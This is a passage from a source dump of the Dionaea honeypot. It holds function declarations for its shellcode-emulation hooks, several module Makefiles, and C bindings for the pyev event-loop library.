119 | uint32_t user_hook_send(struct emu_env *env, struct emu_env_hook *hook, ...); 120 | uint32_t user_hook_socket(struct emu_env *env, struct emu_env_hook *hook, ...); 121 | uint32_t user_hook_WSASocket(struct emu_env *env, struct emu_env_hook *hook, ...); 122 | uint32_t user_hook_CreateProcess(struct emu_env *env, struct emu_env_hook *hook, ...); 123 | void user_hook_WaitForSingleObject_cb(EV_P_ struct ev_child *w, int revents); 124 | uint32_t user_hook_WaitForSingleObject(struct emu_env *env, struct emu_env_hook *hook, ...); 125 | 126 | 127 | uint32_t user_hook_CreateFile(struct emu_env *env, struct emu_env_hook *hook, ...); 128 | uint32_t user_hook_WriteFile(struct emu_env *env, struct emu_env_hook *hook, ...); 129 | uint32_t user_hook_CloseHandle(struct emu_env *env, struct emu_env_hook *hook, ...); 130 | 131 | int32_t ll_win_hook_recv(struct emu_env *env, struct emu_env_hook *hook); 132 | int32_t ll_win_hook_accept(struct emu_env *env, struct emu_env_hook *hook); 133 | 134 | 135 | uint32_t user_hook__lcreat(struct emu_env *env, struct emu_env_hook *hook, ...); 136 | uint32_t user_hook__lwrite(struct emu_env *env, struct emu_env_hook *hook, ...); 137 | uint32_t user_hook__lclose(struct emu_env *env, struct emu_env_hook *hook, ...); 138 | 139 | extern struct processor proc_emu; 140 | -------------------------------------------------------------------------------- /modules/nc/Makefile.am: -------------------------------------------------------------------------------- 1 | # $Id$ 2 | 3 | AUTOMAKE_OPTIONS = foreign 4 | 5 | AM_CFLAGS = -I$(top_srcdir)/include -I$(top_srcdir)/src 6 | 7 | AM_CFLAGS += 8 | AM_LDFLAGS = 9 | 10 | 11 | pkglib_LTLIBRARIES = nc.la 12 | 13 | nc_la_SOURCES = nc.c nc.h 14 | 15 | nc_la_LDFLAGS = -module -no-undefined -avoid-version ${AM_LDFLAGS} 16 | -------------------------------------------------------------------------------- /modules/nc/nc.h: -------------------------------------------------------------------------------- 1 | /******************************************************************************** 2 | * Dionaea 3 | * - catches bugs - 4 | * 5 | * 6 | * 7 | * Copyright (C) 2009 Paul Baecher & Markus Koetter 8 | * 9 | * This program is free software; you can redistribute it and/or 10 | * modify it under the terms of the GNU General Public License 11 | * as published by the Free Software Foundation; either version 2 12 | * of the License, or (at your option) any later version. 13 | * 14 | * This program is distributed in the hope that it will be useful, 15 | * but WITHOUT ANY WARRANTY; without even the implied warranty of 16 | * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 17 | * GNU General Public License for more details. 18 | * 19 | * You should have received a copy of the GNU General Public License 20 | * along with this program; if not, write to the Free Software 21 | * Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. 22 | * 23 | * 24 | * contact nepenthesdev@gmail.com 25 | * 26 | *******************************************************************************/ 27 | 28 | 29 | #include 30 | 31 | struct connection; 32 | 33 | void proto_nc_established(struct connection *con); 34 | void proto_nc_established_source(struct connection *con); 35 | bool proto_nc_error(struct connection *con, enum connection_error error); 36 | uint32_t proto_nc_io_in(struct connection *con, void *context, unsigned char *data, uint32_t size); 37 | uint32_t proto_nc_io_in_redir(struct connection *con, void *context, unsigned char *data, uint32_t size); 38 | bool proto_nc_disconnect(struct connection *con, void *context); 39 | bool proto_nc_timeout(struct connection *con, void *context); 40 | void *proto_nc_ctx_new(struct connection *con); 41 | void proto_nc_ctx_free(void *ctx); 42 | 43 | void proto_nc_established_http(struct connection *con); 44 | uint32_t proto_nc_io_in_http(struct connection *con, void *context, unsigned char *data, uint32_t size); 45 | void *proto_nc_ctx_new_http(struct connection *con); 46 | void proto_nc_ctx_free_http(void *ctx); 47 | 48 | extern struct protocol proto_nc_http; 49 | extern struct protocol proto_nc_source; 50 | extern struct protocol proto_nc_sink; 51 | extern struct protocol proto_nc_redir; 52 | 53 | -------------------------------------------------------------------------------- /modules/nfq/Makefile.am: -------------------------------------------------------------------------------- 1 | # $Id: Makefile.am 2538 2009-01-25 22:35:27Z common $ 2 | 3 | AUTOMAKE_OPTIONS = foreign 4 | 5 | AM_CFLAGS = -I$(top_srcdir)/include -I$(top_srcdir)/src -pipe -D _GNU_SOURCE -fno-strict-aliasing 6 | AM_CFLAGS += -Wall -Werror 7 | 8 | AM_CFLAGS += ${LIB_LCFG_CFLAGS} ${LIB_GLIB_CFLAGS} 9 | AM_LDFLAGS = ${LIB_LCFG_LIBS} ${LIB_GLIB_LIBS} 10 | 11 | 12 | pkglib_LTLIBRARIES = nfq.la 13 | 14 | nfq_la_SOURCES = nfq.c nfq.h 15 | 16 | nfq_la_LDFLAGS = -module -no-undefined -avoid-version -lnetfilter_queue 17 | -------------------------------------------------------------------------------- /modules/nl/Makefile.am: -------------------------------------------------------------------------------- 1 | # $Id$ 2 | 3 | AUTOMAKE_OPTIONS = foreign 4 | 5 | AM_CFLAGS = -I$(top_srcdir)/include -I$(top_srcdir)/src 6 | AM_CFLAGS += ${CFLAGS_DEFAULT} ${CFLAGS_DEBUG} 7 | 8 | #AM_CFLAGS += -g -I/opt/dionaea/include/netlink/ 9 | AM_CFLAGS += $(LIB_NL_CFLAGS) 10 | #AM_LDFLAGS = -Wl,-rpath,/opt/dionaea/lib -L/opt/dionaea/lib -lnl -lnl-route -lnl-genl -lnl-nf 11 | AM_LDFLAGS = $(LIB_NL_LIBS) 12 | 13 | 14 | pkglib_LTLIBRARIES = nl.la 15 | 16 | nl_la_SOURCES = module.c 17 | 18 | nl_la_LDFLAGS = -module -no-undefined -avoid-version ${AM_LDFLAGS} 19 | -------------------------------------------------------------------------------- /modules/pcap/Makefile.am: -------------------------------------------------------------------------------- 1 | # $Id$ 2 | 3 | AUTOMAKE_OPTIONS = foreign 4 | 5 | AM_CFLAGS = -I$(top_srcdir)/include -I$(top_srcdir)/src 6 | AM_CFLAGS += -fno-strict-aliasing 7 | 8 | AM_CFLAGS += $(LIB_PCAP_CFLAGS) 9 | AM_LDFLAGS = $(LIB_PCAP_LIBS) 10 | 11 | pkglib_LTLIBRARIES = pcap.la 12 | 13 | pcap_la_SOURCES = pcap.c 14 | 15 | pcap_la_LDFLAGS = -module -no-undefined -avoid-version ${AM_LDFLAGS} 16 | 17 | -------------------------------------------------------------------------------- /modules/python/Makefile.am: -------------------------------------------------------------------------------- 1 | # $Id$ 2 | 3 | AUTOMAKE_OPTIONS = foreign 4 | 5 | SUBDIRS = scripts util 6 | 7 | all: binding.c 8 | 9 | binding.c: setup.py setup.py.in binding.pyx module.c module.h ../../config.h ../../include/protocol.h ../../include/dionaea.h 10 | $(PYTHON) setup.py build 11 | 12 | install-exec-am: all 13 | cp build/*/dionaea/*.so $(DESTDIR)$(pkglibdir)/python.so 14 | rm -rf $(DESTDIR)$(pkglibdir)/python/dionaea/core.so 15 | ln -s $(DESTDIR)$(pkglibdir)/python.so $(DESTDIR)$(pkglibdir)/python/dionaea/core.so 16 | rm -rf $(DESTDIR)$(pkglibdir)/python/dionaea/pyev.so 17 | ln -s $(DESTDIR)$(pkglibdir)/python.so $(DESTDIR)$(pkglibdir)/python/dionaea/pyev.so 18 | 19 | clean: 20 | $(PYTHON) setup.py clean 21 | rm -rf ./build binding.{c,h} 22 | 23 | dist-clean: clean 24 | 25 | 26 | EXTRA_DIST = setup.py module.c module.h binding.pyx 27 | 28 | -------------------------------------------------------------------------------- /modules/python/module.h: -------------------------------------------------------------------------------- 1 | /******************************************************************************** 2 | * Dionaea 3 | * - catches bugs - 4 | * 5 | * 6 | * 7 | * Copyright (C) 2009 Paul Baecher & Markus Koetter 8 | * 9 | * This program is free software; you can redistribute it and/or 10 | * modify it under the terms of the GNU General Public License 11 | * as published by the Free Software Foundation; either version 2 12 | * of the License, or (at your option) any later version. 13 | * 14 | * This program is distributed in the hope that it will be useful, 15 | * but WITHOUT ANY WARRANTY; without even the implied warranty of 16 | * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 17 | * GNU General Public License for more details. 18 | * 19 | * You should have received a copy of the GNU General Public License 20 | * along with this program; if not, write to the Free Software 21 | * Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. 22 | * 23 | * 24 | * contact nepenthesdev@gmail.com 25 | * 26 | *******************************************************************************/ 27 | 28 | #include 29 | #include "connection.h" 30 | 31 | #define PY_CLONE(T) (T)->ob_type->tp_new((T)->ob_type, __pyx_empty_tuple, NULL) 32 | #define PY_NEW(T) (((PyTypeObject*)(T))->tp_new( (PyTypeObject*)(T), __pyx_empty_tuple, NULL)) 33 | #define PY_INIT(P, O) (P)->ob_type->tp_init((O), __pyx_empty_tuple, NULL) 34 | #define REFCOUNT(T) printf("obj refcount %i\n", (int)(T)->ob_refcnt) 35 | 36 | #define REMOTE(C) (C)->remote 37 | #define LOCAL(C) (C)->local 38 | 39 | struct connection; 40 | 41 | unsigned int python_handle_io_in_cb(struct connection *con, void *context, unsigned char *data, uint32_t size); 42 | 43 | void log_wrap(char *name, int number, char *file, int line, char *msg); 44 | void traceback(void); 45 | PyObject *pygetifaddrs(PyObject *self, PyObject *args); 46 | PyObject *pylcfg(PyObject *self, PyObject *args); 47 | PyObject *pyversion(PyObject *self, PyObject *args); 48 | 49 | 50 | struct ihandler; 51 | struct incident; 52 | void set_ihandler(struct ihandler *ih); 53 | void traceable_ihandler_cb(struct incident *i, void *ctx); 54 | 55 | 56 | struct protocol; 57 | void set_protocol(struct protocol *p); 58 | void *traceable_ctx_new_cb(struct connection *con); 59 | void traceable_ctx_free_cb(void *ctx); 60 | void traceable_origin_cb(struct connection *origin, struct connection *con); 61 | void traceable_established_cb(struct connection *con); 62 | uint32_t traceable_io_in_cb(struct connection *con, void *context, unsigned char *data, uint32_t size); 63 | void traceable_io_out_cb(struct connection *con, void *context); 64 | bool traceable_error_cb(struct connection *con, enum connection_error error); 65 | bool traceable_disconnect_cb(struct connection *con, void *context); 66 | bool traceable_idle_timeout_cb(struct connection *con, void *context); 67 | bool traceable_listen_timeout_cb(struct connection *con, void *context); 68 | bool traceable_sustain_timeout_cb(struct connection *con, void *context); 69 | 70 | struct processor; 71 | void set_processor(struct processor *); 72 | void python_processor_bistream_create(struct connection *con); 73 | 74 | -------------------------------------------------------------------------------- /modules/python/pyev/Async.c: -------------------------------------------------------------------------------- 1 | /******************************************************************************* 2 | * AsyncType 3 | *******************************************************************************/ 4 | 5 | /* AsyncType.tp_doc */ 6 | PyDoc_STRVAR(Async_tp_doc, 7 | "Async(loop, callback[, data=None, priority=0])"); 8 | 9 | 10 | /* AsyncType.tp_new */ 11 | static PyObject * 12 | Async_tp_new(PyTypeObject *type, PyObject *args, PyObject *kwargs) 13 | { 14 | Async *self = (Async *)WatcherType.tp_new(type, args, kwargs); 15 | if (!self) { 16 | return NULL; 17 | } 18 | new_Watcher((Watcher *)self, (ev_watcher *)&self->async, EV_ASYNC); 19 | return (PyObject *)self; 20 | } 21 | 22 | 23 | /* Async.send() */ 24 | PyDoc_STRVAR(Async_send_doc, 25 | "send()"); 26 | 27 | static PyObject * 28 | Async_send(Async *self) 29 | { 30 | ev_async_send(((Watcher *)self)->loop->loop, &self->async); 31 | Py_RETURN_NONE; 32 | } 33 | 34 | 35 | /* AsyncType.tp_methods */ 36 | static PyMethodDef Async_tp_methods[] = { 37 | {"send", (PyCFunction)Async_send, 38 | METH_NOARGS, Async_send_doc}, 39 | {NULL} /* Sentinel */ 40 | }; 41 | 42 | 43 | /* Async.sent */ 44 | PyDoc_STRVAR(Async_sent_doc, 45 | "sent"); 46 | 47 | static PyObject * 48 | Async_sent_get(Async *self, void *closure) 49 | { 50 | PYEV_RETURN_BOOL(ev_async_pending(&self->async)); 51 | } 52 | 53 | 54 | /* AsyncType.tp_getsets */ 55 | static PyGetSetDef Async_tp_getsets[] = { 56 | {"sent", (getter)Async_sent_get, NULL, 57 | Async_sent_doc, NULL}, 58 | {NULL} /* Sentinel */ 59 | }; 60 | 61 | 62 | /* AsyncType */ 63 | static PyTypeObject AsyncType = { 64 | PyVarObject_HEAD_INIT(NULL, 0) 65 | "pyev.Async", /*tp_name*/ 66 | sizeof(Async), /*tp_basicsize*/ 67 | 0, /*tp_itemsize*/ 68 | 0, /*tp_dealloc*/ 69 | 0, /*tp_print*/ 70 | 0, /*tp_getattr*/ 71 | 0, /*tp_setattr*/ 72 | 0, /*tp_compare*/ 73 | 0, /*tp_repr*/ 74 | 0, /*tp_as_number*/ 75 | 0, /*tp_as_sequence*/ 76 | 0, /*tp_as_mapping*/ 77 | 0, /*tp_hash */ 78 | 0, /*tp_call*/ 79 | 0, /*tp_str*/ 80 | 0, /*tp_getattro*/ 81 | 0, /*tp_setattro*/ 82 | 0, /*tp_as_buffer*/ 83 | Py_TPFLAGS_DEFAULT | Py_TPFLAGS_BASETYPE, /*tp_flags*/ 84 | Async_tp_doc, /*tp_doc*/ 85 | 0, /*tp_traverse*/ 86 | 0, /*tp_clear*/ 87 | 0, /*tp_richcompare*/ 88 | 0, /*tp_weaklistoffset*/ 89 | 0, /*tp_iter*/ 90 | 0, /*tp_iternext*/ 91 | Async_tp_methods, /*tp_methods*/ 92 | 0, /*tp_members*/ 93 | Async_tp_getsets, /*tp_getsets*/ 94 | 0, /*tp_base*/ 95 | 0, /*tp_dict*/ 96 | 0, /*tp_descr_get*/ 97 | 0, /*tp_descr_set*/ 98 | 0, /*tp_dictoffset*/ 99 | 0, /*tp_init*/ 100 | 0, /*tp_alloc*/ 101 | Async_tp_new, /*tp_new*/ 102 | }; 103 | -------------------------------------------------------------------------------- /modules/python/pyev/Check.c: -------------------------------------------------------------------------------- 1 | /******************************************************************************* 2 | * CheckType 3 | *******************************************************************************/ 4 | 5 | /* CheckType.tp_doc */ 6 | PyDoc_STRVAR(Check_tp_doc, 7 | "Check(loop, callback[, data=None, priority=0])"); 8 | 9 | 10 | /* CheckType.tp_new */ 11 | static PyObject * 12 | Check_tp_new(PyTypeObject *type, PyObject *args, PyObject *kwargs) 13 | { 14 | Check *self = (Check *)WatcherType.tp_new(type, args, kwargs); 15 | if (!self) { 16 | return NULL; 17 | } 18 | new_Watcher((Watcher *)self, (ev_watcher *)&self->check, EV_CHECK); 19 | return (PyObject *)self; 20 | } 21 | 22 | 23 | /* CheckType */ 24 | static PyTypeObject CheckType = { 25 | PyVarObject_HEAD_INIT(NULL, 0) 26 | "pyev.Check", /*tp_name*/ 27 | sizeof(Check), /*tp_basicsize*/ 28 | 0, /*tp_itemsize*/ 29 | 0, /*tp_dealloc*/ 30 | 0, /*tp_print*/ 31 | 0, /*tp_getattr*/ 32 | 0, /*tp_setattr*/ 33 | 0, /*tp_compare*/ 34 | 0, /*tp_repr*/ 35 | 0, /*tp_as_number*/ 36 | 0, /*tp_as_sequence*/ 37 | 0, /*tp_as_mapping*/ 38 | 0, /*tp_hash */ 39 | 0, /*tp_call*/ 40 | 0, /*tp_str*/ 41 | 0, /*tp_getattro*/ 42 | 0, /*tp_setattro*/ 43 | 0, /*tp_as_buffer*/ 44 | Py_TPFLAGS_DEFAULT | Py_TPFLAGS_BASETYPE, /*tp_flags*/ 45 | Check_tp_doc, /*tp_doc*/ 46 | 0, /*tp_traverse*/ 47 | 0, /*tp_clear*/ 48 | 0, /*tp_richcompare*/ 49 | 0, /*tp_weaklistoffset*/ 50 | 0, /*tp_iter*/ 51 | 0, /*tp_iternext*/ 52 | 0, /*tp_methods*/ 53 | 0, /*tp_members*/ 54 | 0, /*tp_getsets*/ 55 | 0, /*tp_base*/ 56 | 0, /*tp_dict*/ 57 | 0, /*tp_descr_get*/ 58 | 0, /*tp_descr_set*/ 59 | 0, /*tp_dictoffset*/ 60 | 0, /*tp_init*/ 61 | 0, /*tp_alloc*/ 62 | Check_tp_new, /*tp_new*/ 63 | }; 64 | -------------------------------------------------------------------------------- /modules/python/pyev/Child.c: -------------------------------------------------------------------------------- 1 | /******************************************************************************* 2 | * utilities 3 | *******************************************************************************/ 4 | 5 | /* set the Child */ 6 | void 7 | set_Child(Child *self, int pid, PyObject *trace) 8 | { 9 | ev_child_set(&self->child, pid, (trace == Py_True) ? 1 : 0); 10 | } 11 | 12 | 13 | /******************************************************************************* 14 | * ChildType 15 | *******************************************************************************/ 16 | 17 | /* ChildType.tp_doc */ 18 | PyDoc_STRVAR(Child_tp_doc, 19 | "Child(pid, trace, loop, callback[, data=None, priority=0])"); 20 | 21 | 22 | /* ChildType.tp_new */ 23 | static PyObject * 24 | Child_tp_new(PyTypeObject *type, PyObject *args, PyObject *kwargs) 25 | { 26 | Child *self = (Child *)WatcherType.tp_new(type, args, kwargs); 27 | if (!self) { 28 | return NULL; 29 | } 30 | new_Watcher((Watcher *)self, (ev_watcher *)&self->child, EV_CHILD); 31 | return (PyObject *)self; 32 | } 33 | 34 | 35 | /* ChildType.tp_init */ 36 | static int 37 | Child_tp_init(Child *self, PyObject *args, PyObject *kwargs) 38 | { 39 | int pid; 40 | PyObject *trace; 41 | Loop *loop; 42 | PyObject *callback, *data = NULL; 43 | int priority = 0; 44 | 45 | static char *kwlist[] = {"pid", "trace", 46 | "loop", "callback", "data", "priority", NULL}; 47 | 48 | if (!PyArg_ParseTupleAndKeywords(args, kwargs, "iO!O!O|Oi:__init__", kwlist, 49 | &pid, &PyBool_Type, &trace, 50 | &LoopType, &loop, &callback, &data, &priority)) { 51 | return -1; 52 | } 53 | if (!ev_is_default_loop(loop->loop)) { 54 | PyErr_SetString(Error, "loop must be the 'default loop'"); 55 | return -1; 56 | } 57 | if (init_Watcher((Watcher *)self, loop, callback, 1, data, priority)) { 58 | return -1; 59 | } 60 | set_Child(self, pid, trace); 61 | return 0; 62 | } 63 | 64 | 65 | /* Child.set(pid, trace) */ 66 | PyDoc_STRVAR(Child_set_doc, 67 | "set(pid, trace)"); 68 | 69 | static PyObject * 70 | Child_set(Child *self, PyObject *args) 71 | { 72 | int pid; 73 | PyObject *trace; 74 | 75 | PYEV_SET_ACTIVE_WATCHER(self); 76 | if (!PyArg_ParseTuple(args, "iO!:set", &pid, &PyBool_Type, &trace)) { 77 | return NULL; 78 | } 79 | set_Child(self, pid, trace); 80 | Py_RETURN_NONE; 81 | } 82 | 83 | 84 | /* ChildType.tp_methods */ 85 | static PyMethodDef Child_tp_methods[] = { 86 | {"set", (PyCFunction)Child_set, 87 | METH_VARARGS, Child_set_doc}, 88 | {NULL} /* Sentinel */ 89 | }; 90 | 91 | 92 | /* Child.pid */ 93 | PyDoc_STRVAR(Child_pid_doc, 94 | "pid"); 95 | 96 | 97 | /* Child.rpid */ 98 | PyDoc_STRVAR(Child_rpid_doc, 99 | "rpid"); 100 | 101 | 102 | /* Child.rstatus */ 103 | PyDoc_STRVAR(Child_rstatus_doc, 104 | "rstatus"); 105 | 106 | 107 | /* ChildType.tp_members */ 108 | static PyMemberDef Child_tp_members[] = { 109 | {"pid", T_INT, offsetof(Child, child.pid), 110 | READONLY, Child_pid_doc}, 111 | {"rpid", T_INT, offsetof(Child, child.rpid), 112 | 0, Child_rpid_doc}, 113 | {"rstatus", T_INT, offsetof(Child, child.rstatus), 114 | 0, Child_rstatus_doc}, 115 | {NULL} /* Sentinel */ 116 | }; 117 | 118 | 119 | /* ChildType */ 120 | static PyTypeObject ChildType = { 121 | PyVarObject_HEAD_INIT(NULL, 0) 122 | "pyev.Child", /*tp_name*/ 123 | sizeof(Child), /*tp_basicsize*/ 124 | 0, /*tp_itemsize*/ 125 | 0, /*tp_dealloc*/ 126 | 0, /*tp_print*/ 127 | 0, /*tp_getattr*/ 128 | 0, /*tp_setattr*/ 129 | 0, /*tp_compare*/ 130 | 0, /*tp_repr*/ 131 | 0, /*tp_as_number*/ 132 | 0, /*tp_as_sequence*/ 133 | 0, /*tp_as_mapping*/ 134 | 0, /*tp_hash */ 135 | 0, /*tp_call*/ 136 | 0, /*tp_str*/ 137 | 0, /*tp_getattro*/ 138 | 0, /*tp_setattro*/ 139 | 0, /*tp_as_buffer*/ 140 | Py_TPFLAGS_DEFAULT | Py_TPFLAGS_BASETYPE, /*tp_flags*/ 141 | Child_tp_doc, /*tp_doc*/ 142 | 0, /*tp_traverse*/ 143 | 0, /*tp_clear*/ 144 | 0, /*tp_richcompare*/ 145 | 0, /*tp_weaklistoffset*/ 146 | 0, /*tp_iter*/ 147 | 0, /*tp_iternext*/ 148 | Child_tp_methods, /*tp_methods*/ 149 | Child_tp_members, /*tp_members*/ 150 | 0, /*tp_getsets*/ 151 | 0, /*tp_base*/ 152 | 0, /*tp_dict*/ 153 | 0, /*tp_descr_get*/ 154 | 0, /*tp_descr_set*/ 155 | 0, /*tp_dictoffset*/ 156 | (initproc)Child_tp_init, /*tp_init*/ 157 | 0, /*tp_alloc*/ 158 | Child_tp_new, /*tp_new*/ 159 | }; 160 | -------------------------------------------------------------------------------- /modules/python/pyev/Fork.c: -------------------------------------------------------------------------------- 1 | /******************************************************************************* 2 | * ForkType 3 | *******************************************************************************/ 4 | 5 | /* ForkType.tp_doc */ 6 | PyDoc_STRVAR(Fork_tp_doc, 7 | "Fork(loop, callback[, data=None, priority=0])"); 8 | 9 | 10 | /* ForkType.tp_new */ 11 | static PyObject * 12 | Fork_tp_new(PyTypeObject *type, PyObject *args, PyObject *kwargs) 13 | { 14 | Fork *self = (Fork *)WatcherType.tp_new(type, args, kwargs); 15 | if (!self) { 16 | return NULL; 17 | } 18 | new_Watcher((Watcher *)self, (ev_watcher *)&self->fork, EV_FORK); 19 | return (PyObject *)self; 20 | } 21 | 22 | 23 | /* ForkType */ 24 | static PyTypeObject ForkType = { 25 | PyVarObject_HEAD_INIT(NULL, 0) 26 | "pyev.Fork", /*tp_name*/ 27 | sizeof(Fork), /*tp_basicsize*/ 28 | 0, /*tp_itemsize*/ 29 | 0, /*tp_dealloc*/ 30 | 0, /*tp_print*/ 31 | 0, /*tp_getattr*/ 32 | 0, /*tp_setattr*/ 33 | 0, /*tp_compare*/ 34 | 0, /*tp_repr*/ 35 | 0, /*tp_as_number*/ 36 | 0, /*tp_as_sequence*/ 37 | 0, /*tp_as_mapping*/ 38 | 0, /*tp_hash */ 39 | 0, /*tp_call*/ 40 | 0, /*tp_str*/ 41 | 0, /*tp_getattro*/ 42 | 0, /*tp_setattro*/ 43 | 0, /*tp_as_buffer*/ 44 | Py_TPFLAGS_DEFAULT | Py_TPFLAGS_BASETYPE, /*tp_flags*/ 45 | Fork_tp_doc, /*tp_doc*/ 46 | 0, /*tp_traverse*/ 47 | 0, /*tp_clear*/ 48 | 0, /*tp_richcompare*/ 49 | 0, /*tp_weaklistoffset*/ 50 | 0, /*tp_iter*/ 51 | 0, /*tp_iternext*/ 52 | 0, /*tp_methods*/ 53 | 0, /*tp_members*/ 54 | 0, /*tp_getsets*/ 55 | 0, /*tp_base*/ 56 | 0, /*tp_dict*/ 57 | 0, /*tp_descr_get*/ 58 | 0, /*tp_descr_set*/ 59 | 0, /*tp_dictoffset*/ 60 | 0, /*tp_init*/ 61 | 0, /*tp_alloc*/ 62 | Fork_tp_new, /*tp_new*/ 63 | }; 64 | -------------------------------------------------------------------------------- /modules/python/pyev/Idle.c: -------------------------------------------------------------------------------- 1 | /******************************************************************************* 2 | * IdleType 3 | *******************************************************************************/ 4 | 5 | /* IdleType.tp_doc */ 6 | PyDoc_STRVAR(Idle_tp_doc, 7 | "Idle(loop, callback[, data=None, priority=0])"); 8 | 9 | 10 | /* IdleType.tp_new */ 11 | static PyObject * 12 | Idle_tp_new(PyTypeObject *type, PyObject *args, PyObject *kwargs) 13 | { 14 | Idle *self = (Idle *)WatcherType.tp_new(type, args, kwargs); 15 | if (!self) { 16 | return NULL; 17 | } 18 | new_Watcher((Watcher *)self, (ev_watcher *)&self->idle, EV_IDLE); 19 | return (PyObject *)self; 20 | } 21 | 22 | 23 | /* IdleType */ 24 | static PyTypeObject IdleType = { 25 | PyVarObject_HEAD_INIT(NULL, 0) 26 | "pyev.Idle", /*tp_name*/ 27 | sizeof(Idle), /*tp_basicsize*/ 28 | 0, /*tp_itemsize*/ 29 | 0, /*tp_dealloc*/ 30 | 0, /*tp_print*/ 31 | 0, /*tp_getattr*/ 32 | 0, /*tp_setattr*/ 33 | 0, /*tp_compare*/ 34 | 0, /*tp_repr*/ 35 | 0, /*tp_as_number*/ 36 | 0, /*tp_as_sequence*/ 37 | 0, /*tp_as_mapping*/ 38 | 0, /*tp_hash */ 39 | 0, /*tp_call*/ 40 | 0, /*tp_str*/ 41 | 0, /*tp_getattro*/ 42 | 0, /*tp_setattro*/ 43 | 0, /*tp_as_buffer*/ 44 | Py_TPFLAGS_DEFAULT | Py_TPFLAGS_BASETYPE, /*tp_flags*/ 45 | Idle_tp_doc, /*tp_doc*/ 46 | 0, /*tp_traverse*/ 47 | 0, /*tp_clear*/ 48 | 0, /*tp_richcompare*/ 49 | 0, /*tp_weaklistoffset*/ 50 | 0, /*tp_iter*/ 51 | 0, /*tp_iternext*/ 52 | 0, /*tp_methods*/ 53 | 0, /*tp_members*/ 54 | 0, /*tp_getsets*/ 55 | 0, /*tp_base*/ 56 | 0, /*tp_dict*/ 57 | 0, /*tp_descr_get*/ 58 | 0, /*tp_descr_set*/ 59 | 0, /*tp_dictoffset*/ 60 | 0, /*tp_init*/ 61 | 0, /*tp_alloc*/ 62 | Idle_tp_new, /*tp_new*/ 63 | }; 64 | -------------------------------------------------------------------------------- /modules/python/pyev/PeriodicBase.c: -------------------------------------------------------------------------------- 1 | /******************************************************************************* 2 | * PeriodicBaseType 3 | *******************************************************************************/ 4 | 5 | /* PeriodicBaseType.tp_new */ 6 | static PyObject * 7 | PeriodicBase_tp_new(PyTypeObject *type, PyObject *args, PyObject *kwargs) 8 | { 9 | PeriodicBase *self = (PeriodicBase *)WatcherType.tp_new(type, args, kwargs); 10 | if (!self) { 11 | return NULL; 12 | } 13 | new_Watcher((Watcher *)self, (ev_watcher *)&self->periodic, EV_PERIODIC); 14 | return (PyObject *)self; 15 | } 16 | 17 | 18 | /* PeriodicBase.reset() */ 19 | PyDoc_STRVAR(PeriodicBase_reset_doc, 20 | "reset()"); 21 | 22 | static PyObject * 23 | PeriodicBase_reset(PeriodicBase *self) 24 | { 25 | ev_periodic_again(((Watcher *)self)->loop->loop, &self->periodic); 26 | Py_RETURN_NONE; 27 | } 28 | 29 | 30 | /* PeriodicBase.at() -> float */ 31 | PyDoc_STRVAR(PeriodicBase_at_doc, 32 | "at() -> float"); 33 | 34 | static PyObject * 35 | PeriodicBase_at(PeriodicBase *self) 36 | { 37 | return PyFloat_FromDouble(ev_periodic_at(&self->periodic)); 38 | } 39 | 40 | 41 | /* PeriodicBaseType.tp_methods */ 42 | static PyMethodDef PeriodicBase_tp_methods[] = { 43 | {"reset", (PyCFunction)PeriodicBase_reset, 44 | METH_NOARGS, PeriodicBase_reset_doc}, 45 | {"at", (PyCFunction)PeriodicBase_at, 46 | METH_NOARGS, PeriodicBase_at_doc}, 47 | {NULL} /* Sentinel */ 48 | }; 49 | 50 | 51 | /* PeriodicBaseType */ 52 | static PyTypeObject PeriodicBaseType = { 53 | PyVarObject_HEAD_INIT(NULL, 0) 54 | "pyev.PeriodicBase", /*tp_name*/ 55 | sizeof(PeriodicBase), /*tp_basicsize*/ 56 | 0, /*tp_itemsize*/ 57 | 0, /*tp_dealloc*/ 58 | 0, /*tp_print*/ 59 | 0, /*tp_getattr*/ 60 | 0, /*tp_setattr*/ 61 | 0, /*tp_compare*/ 62 | 0, /*tp_repr*/ 63 | 0, /*tp_as_number*/ 64 | 0, /*tp_as_sequence*/ 65 | 0, /*tp_as_mapping*/ 66 | 0, /*tp_hash */ 67 | 0, /*tp_call*/ 68 | 0, /*tp_str*/ 69 | 0, /*tp_getattro*/ 70 | 0, /*tp_setattro*/ 71 | 0, /*tp_as_buffer*/ 72 | Py_TPFLAGS_DEFAULT | Py_TPFLAGS_BASETYPE, /*tp_flags*/ 73 | 0, /*tp_doc*/ 74 | 0, /*tp_traverse*/ 75 | 0, /*tp_clear*/ 76 | 0, /*tp_richcompare*/ 77 | 0, /*tp_weaklistoffset*/ 78 | 0, /*tp_iter*/ 79 | 0, /*tp_iternext*/ 80 | PeriodicBase_tp_methods, /*tp_methods*/ 81 | 0, /*tp_members*/ 82 | 0, /*tp_getsets*/ 83 | 0, /*tp_base*/ 84 | 0, /*tp_dict*/ 85 | 0, /*tp_descr_get*/ 86 | 0, /*tp_descr_set*/ 87 | 0, /*tp_dictoffset*/ 88 | 0, /*tp_init*/ 89 | 0, /*tp_alloc*/ 90 | PeriodicBase_tp_new, /*tp_new*/ 91 | }; 92 | -------------------------------------------------------------------------------- /modules/python/pyev/Prepare.c: -------------------------------------------------------------------------------- 1 | /******************************************************************************* 2 | * PrepareType 3 | *******************************************************************************/ 4 | 5 | /* PrepareType.tp_doc */ 6 | PyDoc_STRVAR(Prepare_tp_doc, 7 | "Prepare(loop, callback[, data=None, priority=0])"); 8 | 9 | 10 | /* PrepareType.tp_new */ 11 | static PyObject * 12 | Prepare_tp_new(PyTypeObject *type, PyObject *args, PyObject *kwargs) 13 | { 14 | Prepare *self = (Prepare *)WatcherType.tp_new(type, args, kwargs); 15 | if (!self) { 16 | return NULL; 17 | } 18 | new_Watcher((Watcher *)self, (ev_watcher *)&self->prepare, EV_PREPARE); 19 | return (PyObject *)self; 20 | } 21 | 22 | 23 | /* PrepareType */ 24 | static PyTypeObject PrepareType = { 25 | PyVarObject_HEAD_INIT(NULL, 0) 26 | "pyev.Prepare", /*tp_name*/ 27 | sizeof(Prepare), /*tp_basicsize*/ 28 | 0, /*tp_itemsize*/ 29 | 0, /*tp_dealloc*/ 30 | 0, /*tp_print*/ 31 | 0, /*tp_getattr*/ 32 | 0, /*tp_setattr*/ 33 | 0, /*tp_compare*/ 34 | 0, /*tp_repr*/ 35 | 0, /*tp_as_number*/ 36 | 0, 